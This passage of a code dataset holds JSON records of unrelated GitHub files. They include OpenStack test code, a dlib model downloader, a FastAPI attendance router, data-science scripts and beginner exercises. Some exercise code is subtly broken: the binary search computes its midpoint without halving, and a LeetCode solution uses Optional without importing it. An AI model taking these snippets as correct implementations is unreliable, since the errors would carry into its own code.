self.lpmdst.pre_live_vol_data = {'vscsi-vol-id': 'fake_udid',\n 'vscsi-vol-id2': 'fake_udid2'}\n self.lpmdst.post_live_migration_at_destination('network_infos', vals)\n # Assertions\n\n for bdm, vol_drv in vals:\n vol_drv.post_live_migration_at_destination.assert_called_with(\n mock.ANY)\n self.assertEqual(len(vals), mock_save_bdm.call_count)\n","repo_name":"openstack/nova-powervm","sub_path":"nova_powervm/tests/virt/powervm/test_live_migration.py","file_name":"test_live_migration.py","file_ext":"py","file_size_in_byte":14386,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"31"} +{"seq_id":"37724143722","text":"import requests\nimport os\nfrom pyunpack import Archive\n\n# The URLs where the models can be downloaded\nurls = [\n \"http://dlib.net/files/shape_predictor_68_face_landmarks.dat.bz2\",\n \"http://dlib.net/files/dlib_face_recognition_resnet_model_v1.dat.bz2\"\n]\n\nfiles = [\n \"shape_predictor_68_face_landmarks.dat.bz2\",\n \"dlib_face_recognition_resnet_model_v1.dat.bz2\"\n]\n\n# Function to download files\ndef download_file(url):\n response = requests.get(url, stream=True)\n\n # Check if the request was successful\n if response.status_code == 200:\n # The file name is the last part of the URL\n filename = url.split(\"/\")[-1]\n\n # Write the content of the request to a file\n with open(filename, \"wb\") as file:\n file.write(response.content)\n\n print(f\"File {filename} downloaded successfully.\")\n else:\n print(f\"Failed to download file from {url}.\")\n\n# Function to extract files\ndef extract_file(file):\n Archive(file).extractall(\".\")\n print(f\"File {file} extracted successfully.\")\n\n# Check if files exist, if not download and extract them\nfor file, url in zip(files, urls):\n if not os.path.exists(file):\n download_file(url)\n extract_file(file)\n else:\n print(f\"File {file} already exists, skipping download.\")\n","repo_name":"artificialnouveau/face-duration","sub_path":"download_dlib.py","file_name":"download_dlib.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25284461908","text":"# simple solution\n# Time Complexity: O(2N)\n# Space Complexity O(N)\n\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\nclass Solution:\n def deleteMiddle(self, head: Optional[ListNode]) -> Optional[ListNode]:\n l = 0\n t_head = head\n while t_head:\n l += 1\n t_head = t_head.next\n res_list = ListNode(0)\n res_list.next = head\n prev = res_list\n curr = head\n \n p = 0\n while curr:\n if p == l//2:\n prev.next = curr.next\n else:\n prev = curr\n curr = curr.next\n p +=1\n return res_list.next","repo_name":"NahidAkhtar84/leet_code_competitive","sub_path":"linked_list/linked_list_delete_middle_node_of_linked_list.py","file_name":"linked_list_delete_middle_node_of_linked_list.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73419196569","text":"# wsrod 40 osob, jaka jest szansa, ze urodzily sie tego samego dnia i miesiaca?\r\n\r\n# losujemy dzien w roku z puli 365(6) dni (dzien i miesiac)\r\n\r\nfrom random import randint\r\n\r\n# pojedynczy eksperyment\r\n\r\nt = {} # do zliczania, ilosci wystepowania poszczegolnych dni\r\nfor i in range(1, 366): t[i] = 0 # <1, 366)\r\n\r\nfor i in range(40):\r\n # dzien roku\r\n dr = randint(1,365) # <1,365>\r\n t[dr] = t[dr]+1\r\n\r\nok = False\r\nfor i in range(1, 366):\r\n if t[i] > 1: ok = True\r\n\r\nprint(ok)\r\n","repo_name":"ksatola/data-science-postgrad","sub_path":"session02/3_python/PythonEx08.py","file_name":"PythonEx08.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"pl","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"39792715974","text":"#!/usr/bin/env python3\n\nimport logging\n\nfrom squareroot import squareroot\n\nlogging.basicConfig(\n format='%(filename)s:%(funcName)s[%(levelname)s]:%(message)s',\n level=logging.INFO\n)\n\ndef func1(x: int):\n logging.info('Need more power !')\n return x**2\n\nlogging.info('starting')\npower = func1(4)\nroot = squareroot.calculate_square_root(power)\nprint('La racine de {:d} est {:f}'.format(power, root))\nlogging.info('exiting')\n","repo_name":"benjaminrodriguez/s4","sub_path":"cours_python/j2/2_Journalisation/monappli/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43590630307","text":"\"ArticlePage object for ecrans\"\n# -*- coding: utf-8 -*-\n\n# Copyright(C) 2011 Julien Hebert\n#\n# This file is part of weboob.\n#\n# weboob is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# weboob is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with weboob. If not, see .\n\nfrom weboob.tools.capabilities.messages.genericArticle import GenericNewsPage, remove_from_selector_list, try_remove_from_selector_list, try_drop_tree, clean_relativ_urls\n\n\nclass ArticlePage(GenericNewsPage):\n \"ArticlePage object for ecrans\"\n def on_loaded(self):\n self.main_div = self.document.getroot()\n self.element_title_selector = \"title\"\n self.element_author_selector = \"p.auteur>a\"\n self.element_body_selector = \"div.bloc_article_01\"\n\n def get_body(self):\n element_body = self.get_element_body()\n remove_from_selector_list(self.parser, element_body, [\"p.auteur\", \"h4\"])\n try_remove_from_selector_list(self.parser, element_body, [\"p.tag\", \"div.alire\", self.element_title_selector, \"h4\"])\n try_drop_tree(self.parser, element_body, \"script\")\n clean_relativ_urls(element_body, \"http://ecrans.fr\")\n\n return self.parser.tostring(element_body)\n","repo_name":"franek/weboob","sub_path":"modules/ecrans/pages/article.py","file_name":"article.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"11846763276","text":"from functools import lru_cache\n\nfrom cegs_portal.search.models import DNAFeature, DNAFeatureType\n\n\ndef check_genome(ref_genome: str, ref_genome_patch: str):\n if len(ref_genome) == 0:\n raise ValueError(f\"reference genome '{ref_genome}'must not be blank\")\n\n if not ((ref_genome_patch.isascii() and ref_genome_patch.isdigit()) or len(ref_genome_patch) == 0):\n raise ValueError(f\"reference genome patch '{ref_genome_patch}' must be either blank or a series of digits\")\n\n\n@lru_cache(maxsize=1)\ndef get_pos_features(chrom_name, ref_genome):\n return list(\n DNAFeature.objects.filter(\n chrom_name=chrom_name,\n strand=\"+\",\n ref_genome=ref_genome,\n feature_type=DNAFeatureType.GENE,\n )\n .order_by(\"location\")\n .all()\n )\n\n\n@lru_cache(maxsize=1)\ndef get_neg_features(chrom_name, ref_genome):\n return list(\n DNAFeature.objects.filter(\n chrom_name=chrom_name,\n strand=\"-\",\n ref_genome=ref_genome,\n feature_type=DNAFeatureType.GENE,\n )\n .order_by(\"location\")\n .all()\n )\n\n\ndef find_pos_closest(dhs_midpoint, features):\n if len(features) == 0:\n return None\n\n start = 0\n end = len(features)\n index = (end + start) // 2\n while True:\n feature = features[index]\n if index == end or index == start:\n # the loop is hacky, but the binary search only gets _close_ to finding the closest feature.\n for i in range(-6, 7):\n new_feature = features[min(max(0, index + i), len(features) - 1)]\n if abs(new_feature.location.lower - dhs_midpoint) < abs(feature.location.lower - dhs_midpoint):\n feature = new_feature\n return feature\n\n if feature.location.lower >= dhs_midpoint:\n end = index\n elif feature.location.lower < dhs_midpoint:\n start = index\n\n index = (end + start) // 2\n\n\ndef find_neg_closest(dhs_midpoint, features):\n if len(features) == 0:\n return None\n\n start = 0\n end = len(features)\n index = (end + start) // 2\n while True:\n feature = features[index]\n if index == end or index == start:\n # the loop is hacky, but the binary search only gets _close_ to finding the closest feature.\n for i in range(-6, 7):\n new_feature = features[min(max(0, index + i), len(features) - 1)]\n if abs(new_feature.location.upper - dhs_midpoint) < abs(feature.location.upper - dhs_midpoint):\n feature = new_feature\n return feature\n\n if feature.location.upper >= dhs_midpoint:\n end = index\n elif feature.location.upper < dhs_midpoint:\n start = index\n\n index = (end + start) // 2\n\n\ndef get_closest_gene(ref_genome, chrom_name, start, end):\n range_midpoint = (start + end) // 2\n closest_pos_feature = find_pos_closest(range_midpoint, get_pos_features(chrom_name, ref_genome))\n\n closest_neg_feature = find_neg_closest(range_midpoint, get_neg_features(chrom_name, ref_genome))\n\n if closest_pos_feature is None and closest_neg_feature is None:\n closest_feature = None\n distance = -1\n gene_name = \"No Gene\"\n elif closest_pos_feature is None:\n closest_feature = closest_neg_feature\n distance = abs(range_midpoint - closest_neg_feature.location.upper)\n elif closest_neg_feature is None or abs(range_midpoint - closest_pos_feature.location.lower) <= abs(\n closest_neg_feature.location.upper - range_midpoint\n ):\n closest_feature = closest_pos_feature\n distance = abs(range_midpoint - closest_pos_feature.location.lower)\n else:\n closest_feature = closest_neg_feature\n distance = abs(closest_neg_feature.location.upper - range_midpoint)\n\n if closest_feature is not None:\n gene_name = closest_feature.name\n\n return closest_feature, distance, gene_name\n","repo_name":"ReddyLab/cegs-portal","sub_path":"scripts/data_loading/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25888377751","text":"\nfrom pxtool.models.output.pxfile.util._px_super import _PxValueByKey\nfrom pxtool.models.output.pxfile.util._px_keytypes import _KeytypeVariableLang, _KeytypeContentLang, _KeytypeVariableValueLang, _KeytypeValuesLangMulti, _KeytypeCodes\n\nfrom pxtool.models.output.pxfile.px_file_model import PXFileModel\nfrom ...validator.validationResult import ValidationResult\nimport pxtool.models.output.pxfile.util.constants as const\nfrom .check_mandatory import check_mandatory\n\n\nclass _Checker:\n def __init__(self, model:PXFileModel) -> None:\n self.val_result = ValidationResult(desc=\"Check if the values found in any subkey are valid. And that values-subkeytype has all variables.\")\n self.error_intro = \"\"\n self.model = model\n\n for keyword_name in const.KEYWORDS_PYTHONIC_MAP:\n keyword = model.get_attribute(const.KEYWORDS_PYTHONIC_MAP[keyword_name])\n if keyword.is_present() and keyword.has_subkey:\n for key in keyword._value_by_key:\n self.error_intro = f\"For keyword {keyword._keyword}\"\n\n if type(key) == _KeytypeContentLang:\n self.check_keytype_content(key, keyword)\n elif isinstance(key, _KeytypeVariableLang): \n self.check_keytype_variable(key, keyword)\n elif isinstance(key, _KeytypeVariableValueLang):\n self.check_keytype_variable_value(key, keyword)\n elif type(key) == _KeytypeValuesLangMulti:\n self.check_keytype_values(key, keyword)\n elif type(key) == _KeytypeCodes:\n #Not valuebased\n pass\n else: # pragma: no cover\n self.val_result.add_error(f\"{self.error_intro}: Sorry, bug in app. Unhandled keytype:{type(key)}. For lang:{key.lang}.\")\n\n def check_keytype_values(self, key:_KeytypeValuesLangMulti, keyword:_PxValueByKey) -> None: \n if not key.values:\n if not keyword.subkey_optional:\n self.val_result.add_error(f\"{self.error_intro}: Values can not be None. For lang:{key.lang}.\")\n else:\n dimensions = self.model.stub.get_value(key.lang) + self.model.heading.get_value(key.lang)\n if not len(dimensions) == len(key.values):\n self.val_result.add_error(f\"{self.error_intro}: There are {len(dimensions)} dimensions, but {len(key.values)} values. For lang:{key.lang}.\")\n else:\n dimension_cnt=-1\n for value in key.values:\n dimension_cnt += 1\n if value == \"*\":\n continue\n self.check_if_value_in_values(key.lang,dimensions[dimension_cnt],value,self.model)\n\n\n\n\n def check_keytype_variable(self, key:_KeytypeVariableLang, keyword:_PxValueByKey) -> None: \n if not key.variable:\n if not keyword.subkey_optional:\n self.val_result.add_error(f\"{self.error_intro}: Variable can not be None. For lang:{key.lang}.\")\n else:\n self.check_variable_in_stub_or_heading(key.lang, key.variable, self.model)\n\n def check_keytype_variable_value(self, key:_KeytypeVariableValueLang, keyword:_PxValueByKey) -> None: \n if not key.variable:\n if key.value:\n self.val_result.add_error(f\"{self.error_intro}: Found value, but no variable . For lang:{key.lang}.\")\n if not keyword.subkey_optional:\n self.val_result.add_error(f\"{self.error_intro}: Variable can not be None. For lang:{key.lang}.\")\n else:\n if not key.value:\n if not keyword.subkey_optional:\n self.val_result.add_error(f\"{self.error_intro}: Need value for variable {key.variable}. For lang:{key.lang}.\") \n else:\n if self.check_variable_in_stub_or_heading(key.lang, key.variable, self.model):\n self.check_if_value_in_values(key.lang, key.variable, key.value, self.model) \n\n\n def check_keytype_content(self, key:_KeytypeContentLang, keyword:_PxValueByKey) -> None: \n if not key.content:\n if not keyword.subkey_optional:\n self.val_result.add_error(f\"{self.error_intro}: Content value can not be None. For lang:{key.lang}.\")\n else:\n self.check_if_value_in_values(key.lang, self.model.contvariable.get_value(key.lang), key.content, self.model) \n \n\n def check_if_value_in_values(self, lang:str, dimension:str, value:str, model:PXFileModel) -> bool:\n my_out = value in model.values.get_value(dimension,lang)\n if not my_out :\n self.val_result.add_error(f\"{self.error_intro}: Cannot find item {value} in VALUES for vaiable:{dimension} and lang:{lang}.\")\n return my_out\n\n def check_variable_in_stub_or_heading(self, lang:str, variable:str, model:PXFileModel) -> bool:\n my_out = variable in model.stub.get_value(lang) + model.heading.get_value(lang)\n if not my_out :\n self.val_result.add_error(f\"{self.error_intro}: Cannot find variable {variable} in stub + heading. For lang:{lang}.\")\n return my_out\n\n\ndef check_valuebased_subkeys(model:PXFileModel) -> ValidationResult:\n return _Checker(model).val_result","repo_name":"statisticsnorway/pxtool","sub_path":"pxtool/operations_on_model/output/validator/checks/check_subkeys.py","file_name":"check_subkeys.py","file_ext":"py","file_size_in_byte":5462,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"32969926579","text":"import sys\nimport pandas as pd\nimport numpy as np\nfrom sklearn import tree\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import svm\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.naive_bayes import BernoulliNB\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import precision_recall_fscore_support\n\ndef ave(score):\n sum = 0.00\n for i in score:\n sum += i\n return sum/len(score)\n\ndef crossValidation(cv_data, cv_label, fold_num, clf):\n cv_label = np.array(cv_label)\n total_row_num = len(cv_data)\n offset = int(total_row_num/fold_num)\n precision = 0\n recall = 0\n fscore = 0\n for i in range(fold_num):\n start_index = i*offset\n #print(\"Start_Index: \" + str(start_index))\n end_index = start_index + offset\n #print(\"End_Index: \" + str(end_index))\n test_data = cv_data.iloc[i*offset:i*offset+offset]\n #test_label = cv_label.iloc[i*offset:i*offset+offset]\n test_label = cv_label[i*offset:i*offset+offset]\n train_data_1 = cv_data.iloc[0:i*offset]\n train_data_2 = cv_data.iloc[i*offset+offset:] \n #train_label_1 = cv_label.iloc[0:i*offset]\n #train_label_2 = cv_label.iloc[i*offset+offset:]\n train_label_1 = cv_label[0:i*offset]\n train_label_2 = cv_label[i*offset+offset:]\n train_data = pd.concat([train_data_1, train_data_2])\n #print(len(train_data))\n #train_label = pd.concat([train_label_1, train_label_2])\n train_label = np.append(train_label_1, train_label_2)\n clf.fit(train_data, train_label)\n results = clf.predict(test_data)\n scores = precision_recall_fscore_support(test_label, results, average = 'binary')\n precision += scores[0]\n recall += scores[1]\n fscore += scores[2]\n return [precision/10.00, recall/10.00, fscore/10.00]\n\nI_data = pd.read_csv('I_data_tuned.csv', header=0)\nI_label = pd.read_csv('I_label.csv', header=0)\n\ncolumns = list(I_data.columns.values)\n\n\n# Drop the entire feature one by one\n#I_label = np.array(I_label['gold'])\n\n# Decision Tree\ndtClf = tree.DecisionTreeClassifier()\nprint(\"Decision Tree F-1 score:\")\nprint(crossValidation(I_data, I_label, 10, dtClf))\n\n# Random Forest\nrfClf = RandomForestClassifier(n_estimators=100)\nprint(\"Random Forest F-1 score:\")\nprint(crossValidation(I_data, I_label, 10, rfClf))\n\n# Support Vector Machine\nlsvmClf = svm.SVC(kernel='linear', C=1)\nprint(\"Linear SVM F-1 score:\")\nprint(crossValidation(I_data, I_label, 10, lsvmClf))\n\n# Naive Bayes\ngnbClf = GaussianNB()\nprint(\"Gaussian Naive Bayes score:\")\nprint(crossValidation(I_data, I_label, 10, gnbClf))\n\nbernoulliClf = BernoulliNB()\nprint(\"Bernoulli Naive Bayes score:\")\nprint(crossValidation(I_data, I_label, 10, bernoulliClf))\n\n# Logistic Regression\nl1lrClf = LogisticRegression(penalty='l1', tol=0.01)\nprint(\"L1 Logistic Regression score: \")\nprint(crossValidation(I_data, I_label, 10, l1lrClf))\n\nl2lrClf = LogisticRegression(penalty='l2', tol=0.01)\nprint(\"L2 Logistic Regression score: \")\nprint(crossValidation(I_data, I_label, 10, l2lrClf))\n\n\n \t\n","repo_name":"Hackerhack0912/CS638","sub_path":"stage4/bestMatcherNew.py","file_name":"bestMatcherNew.py","file_ext":"py","file_size_in_byte":3394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6573408499","text":"from fastapi import APIRouter, HTTPException, status,Depends\nfrom database.StudentAttendence_db import ( \n addSTD_attendence,\n viewSTD_attendence,\n modifySTD_attendence,\n searchSTD_attendence,\n deleteSTD_attendenceid\n)\nfrom models.StudentAttendence import StudentAttendence,StudentAttendence_modify\nfrom database.auth import AuthHandler\nauth_handler=AuthHandler()\n\nrouter = APIRouter(\n prefix=\"/stdattendence\",\n tags=[\"Student_attendence\"],\n dependencies=[Depends(auth_handler.auth_wrapper)],\n responses={404: {\"description\": \"Not found\"}},)\n\n\n@router.get(\"/\" )\nasync def view_STD_attendence(user=Depends(auth_handler.auth_wrapper)):\n auth_handler.has_permission(user, 'view_employee')\n\n response = await viewSTD_attendence()\n if response: \n return {\n \"status\" : status.HTTP_200_OK, \n \"STD_attendences\" : response }\n return {\"error\": status.HTTP_204_NO_CONTENT} \n\n\n@router.get(\"/{STD_attendence_id}\")\nasync def search_STD_attendence(STD_attendence_id:str):\n # print(STD_attendence_id)\n response = await searchSTD_attendence(STD_attendence_id)\n return response\n\n\n\n@router.post(\"/\")\nasync def mark_STD_attendence(STD_attendence : StudentAttendence):\n response = await addSTD_attendence(STD_attendence.dict())\n if response==True:\n return {\"response \": \"Successfully added . . .\",\n \"status\" : status.HTTP_200_OK} \n return {\"response\" : response, \"status\" :status.HTTP_203_NON_AUTHORITATIVE_INFORMATION }\n\n\n@router.put(\"/modify/{STD_attendence_id}\")\nasync def modify_STD_attendence(STD_attendence_id: str , data : StudentAttendence_modify):\n response = await modifySTD_attendence(STD_attendence_id, data.dict(exclude_none=True))\n return response\n\n\n@router.delete('/{id}')\nasync def delete_std_id(id: str):\n \n response = await deleteSTD_attendenceid(id)\n if not response:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f'No record with id: {id} found')\n return { \"Status\":\"Succesfully deleted \",\n \"status_code \" : status.HTTP_200_OK}\n\n\n\n\n","repo_name":"khizar596/sms_backend","sub_path":"routes/StudentAttendence_route.py","file_name":"StudentAttendence_route.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7454899812","text":"#create a fibonacci series number\n#using recursion\nimport sys\n\n#recursive function to find fibonaccis series \ndef fibonacci(n):\n\tif(n == 1): #base case 1\n\t\treturn 0 \n\telif(n == 2): #base case 2\n\t\treturn 1\n\telse:\n\t\treturn fibonacci(n-1) + fibonacci(n-2)\n\n\nnum = int(input(\"Please eneter the numbe: \"))\n\n#make sure number is positive\nif(num < 0):\n\tprint(\"number needs to be positive\")\n\tsys.exit(0)\n\n#call to reccursive function\noutput = fibonacci(num)\n\nprint(\"The {0} fibonacci number in series is {1}\".format(num, output))\n","repo_name":"soundzues/Python-Practice","sub_path":"fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41407700686","text":"# Programmed by MD. Mehedi Hasan\n\nimport random\n\nlist_size = 20\nmy_list = random.sample(list(range(1, 40)), list_size)\t# get some random numbers\nmy_list = sorted(my_list)\n\nprint(\"List:\")\nprint(my_list)\n\ndef binary_search(list, item):\n\tlow = 0\n\thigh = len(list) - 1\n\t\n\twhile low <= high:\n\t\tmid = (low + high)\n\t\tguess = list[mid]\n\t\tif guess == item:\n\t\t\treturn mid\n\t\tif guess > item:\n\t\t\thigh = mid - 1\n\t\telse:\n\t\t\tlow = mid + 1\n\treturn None\n\nprint(\"\\nIndex of the item:\")\nprint(binary_search(my_list, 11))\n","repo_name":"Mehedi61/Algorithms","sub_path":"algorithms/Binary_Search.py","file_name":"Binary_Search.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"25011997275","text":"'''\nAccept N numbers from user and display all such numbers which contains 3 digits in it.\nInput : N : 6 \nElements : 8225 665 3 76 953 858\nOutput : 665 953 858 \n'''\n\ndef AcceptElements(arr,size):\n print(\"Enter the elements:\");\n for i in range(0,size):\n arr.append(int(input()));\n \ndef DisplayElements(arr):\n for i in arr:\n print(i);\n \ndef DisplayThreeDigitNumber(arr):\n print(\"Result:\");\n for num in arr:\n iCnt = 0;\n temp = num;\n while(temp != 0):\n iCnt = iCnt+1;\n temp = int(temp/10);\n if(iCnt == 3):\n print(num);\n\ndef main():\n size = int(input(\"Enter number of elements: \"));\n arr = [];\n AcceptElements(arr,size);\n print(\"Entered elements are:\");\n DisplayElements(arr);\n DisplayThreeDigitNumber(arr);\n\nif __name__ == \"__main__\":\n main();","repo_name":"Aditya-A-Pardeshi/Coding-Hands-On","sub_path":"4 Python_Programs/5 Problems on N numbers/18_DisplayNumbers_WithThreeDigits/Demo.py","file_name":"Demo.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"32589014342","text":"\"\"\"\n바보같이 파일 100개 이름을 똑같이 만들어서 이름에 사람 이름 추가하는 코드\n귀찮으니까 그 폴더 안으로 이동해서 이 코드 돌리기\n\"\"\"\n\nimport os\n\nperson_name = \"hyemi\"\nfolder_path = \"./Preprocess/hyemi/scissor\"\nfiles = os.listdir(folder_path)\n\nfor file_name in files:\n old_path = os.path.join(folder_path, file_name)\n \n new_file_name = person_name + file_name\n new_path = os.path.join(folder_path, new_file_name)\n \n os.rename(old_path, new_path)\n print(f\"Renamed '{file_name}' to '{new_file_name}'\")\n\nprint(f\"Completed {folder_path}\")\n","repo_name":"Hyempire/RockPaperScissor","sub_path":"Preprocess/changeName.py","file_name":"changeName.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23559445695","text":"import argparse\nimport multiprocessing\nimport os\nfrom os import PathLike\nfrom typing import List, Union\n\nimport h5py\nimport librosa\nimport numpy as np\nimport paddleaudio as pa\nimport yaml\nfrom paddleaudio.utils.log import Logger\nimport paddle\nlogger = Logger(__file__)\nimport torchaudio\nimport torch\n\n\nclass FeatureExtractor:\n def __init__(self, **kwargs):\n self.kwargs = kwargs\n self.transform = pa.transforms.MelSpectrogram(**kwargs)\n #self.transform = torchaudio.transforms.MelSpectrogram(**kwargs)\n\n def process_wav(self, wav: Union[PathLike, np.ndarray]) -> np.ndarray:\n\n if isinstance(wav, str):\n wav, sr = librosa.load(wav, sr=None)\n #wav, sr = pa.load(wav, sr=None)\n target_sr = self.kwargs.get('sr')\n #assert sr == target_sr, f'sr: {sr} ~= {target_sr}'\n\n if wav.dtype == 'int16':\n wav = pa.depth_convert(wav, 'float32')\n wav = paddle.to_tensor(wav).unsqueeze(0)\n x = self.transform(wav)\n return x\n\n\ndef wav_list_to_fbank(wav_list: List[PathLike],\n key_list: List[str],\n dst_file: PathLike,\n feature_extractor: FeatureExtractor) -> None:\n \"\"\"Convert wave list to fbank, store into an h5 file\n \"\"\"\n dst_file = os.path.expanduser(dst_file)\n logger.info(f'saving to {dst_file}')\n dst_h5_obj = h5py.File(dst_file, \"w\")\n logger.info(f'{len(wav_list)} wav files listed')\n for f, key in zip(wav_list, key_list):\n x = feature_extractor.process_wav(f)\n dst_h5_obj.create_dataset(key, data=x)\n dst_h5_obj.close()\n\n\ndef wav_list_to_fbank_mp(params):\n \"\"\"Convert wave list to fbank, store into an h5 file, multiprocessing warping\"\"\"\n\n wav_list, key_list, dst_file = params\n wav_list_to_fbank(wav_list, key_list, dst_file, feature_extractor)\n\n\ndef read_scp(scp_file):\n scp_file = os.path.expanduser(scp_file)\n with open(scp_file) as f:\n lines = f.read().split('\\n')\n\n# import pdb;pdb.set_trace()\n names = [l.split()[0] for l in lines if len(l) > 1]\n files = [l.split()[1] for l in lines if len(l) > 1]\n return names, files\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='wave2mel')\n parser.add_argument(\n '-c', '--config', type=str, required=True, default='config.yaml')\n args = parser.parse_args()\n\n with open(args.config) as f:\n config = yaml.safe_load(f)\n paddle.set_device(config['device'])\n feature_extractor = FeatureExtractor(**config['fbank'])\n\n names, wav_files = read_scp(config['wav_scp'])\n n_file_per_h5 = config['h5']['n_wavs']\n if n_file_per_h5 == -1:\n logger.info('no grouping')\n n_group = 1\n group_files = [wav_files]\n group_names = [names]\n\n else:\n logger.info(f'grouping {n_file_per_h5} files into one h5 file')\n n_group = len(wav_files) // n_file_per_h5 + 1\n group_files = [\n wav_files[i * n_file_per_h5:(i + 1) * n_file_per_h5]\n for i in range(n_group)\n ]\n group_names = [\n names[i * n_file_per_h5:(i + 1) * n_file_per_h5]\n for i in range(n_group)\n ]\n\n os.makedirs(config['h5']['output_folder'], exist_ok=True)\n\n n_workers = config['num_works']\n logger.info(f'Using {n_workers} process(es)')\n if n_workers <= 1:\n for i in range(n_group):\n logger.info(f'processing group {i}/{n_group}')\n prefix = config['h5']['prefix']\n dst_file = os.path.join(config['h5']['output_folder'],\n f'{prefix}-{i:05}.h5')\n logger.info(f'saving file to {dst_file}')\n wav_list_to_fbank(group_files[i], group_names[i], dst_file,\n feature_extractor)\n else:\n pool = multiprocessing.Pool(n_workers)\n dst_files = []\n # Collect multi-processing parameters\n for i in range(n_group):\n prefix = config['h5']['prefix']\n dst_file = os.path.join(config['h5']['output_folder'],\n f'{prefix}-{i:05}.h5')\n dst_files.append(dst_file)\n params = [(file, name, dst_file)\n for file, name, dst_file in zip(group_files, group_names,\n dst_files)]\n\n pool.map(wav_list_to_fbank_mp, params)\n pool.close()\n pool.join()\n","repo_name":"ranchlai/preprocessing","sub_path":"wav2fbank.py","file_name":"wav2fbank.py","file_ext":"py","file_size_in_byte":4459,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"5670778998","text":"from pyramid.config import Configurator\nfrom pyramidattachs.resources import Root\n\ndef main(global_config, **settings):\n \"\"\" This function returns a Pyramid WSGI application.\n \"\"\"\n config = Configurator(root_factory=Root, settings=settings)\n config.add_view('pyramidattachs.views.my_view',\n context='pyramidattachs:resources.Root',\n renderer='pyramidattachs:templates/mytemplate.pt')\n config.add_static_view('static', 'pyramidattachs:static')\n return config.make_wsgi_app()\n\n","repo_name":"bireme/isisdm","sub_path":"examples/pyramid-attachs/build/lib.linux-x86_64-2.6/pyramidattachs/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"6906034979","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Time-stamp: \"2023-04-23 11:02:45 (ywatanabe)\"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchsummary import summary\nimport mngs\nimport numpy as np\n\n\nclass ChannelGainChanger(nn.Module):\n def __init__(\n self,\n n_chs,\n ):\n super().__init__()\n self.n_chs = n_chs\n\n def forward(self, x):\n \"\"\"x: [batch_size, n_chs, seq_len]\"\"\"\n if self.training:\n ch_gains = (\n torch.rand(self.n_chs).unsqueeze(0).unsqueeze(-1).to(x.device) + 0.5\n )\n ch_gains = F.softmax(ch_gains, dim=1)\n x *= ch_gains\n\n return x\n\n\nif __name__ == \"__main__\":\n ## Demo data\n bs, n_chs, seq_len = 16, 360, 1000\n x = torch.rand(bs, n_chs, seq_len)\n\n cgc = ChGainChanger(n_chs)\n print(cgc(x).shape) # [16, 19, 1000]\n\n # sb = SubjectBlock(n_chs=n_chs)\n # print(sb(x, s).shape) # [16, 270, 1000]\n\n # summary(sb, x, s)\n","repo_name":"ywatanabe1989/mngs","sub_path":"src/mngs/nn/_ChannelGainChanger.py","file_name":"_ChannelGainChanger.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18814124209","text":"# Problem Statement.\n'''\n A1\n AB12\n ABC123\nABCD1234\n'''\nA=[0,\"A\",\"B\",\"C\",\"D\"]\nfor i in range(1,5):\n k = 1\n m = 1\n for j in range(1,9):\n if j>=(5-i) and j<=(4+i):\n if j <= 4:\n print(f\"{A[k]}\",end=\"\")\n k += 1\n else:\n print(m, end=\"\")\n m+=1\n else:\n print(\" \",end=\"\")\n print(\"\")","repo_name":"Saurabh1Barasiya/100_days_of_code","sub_path":"tringle22.py","file_name":"tringle22.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} 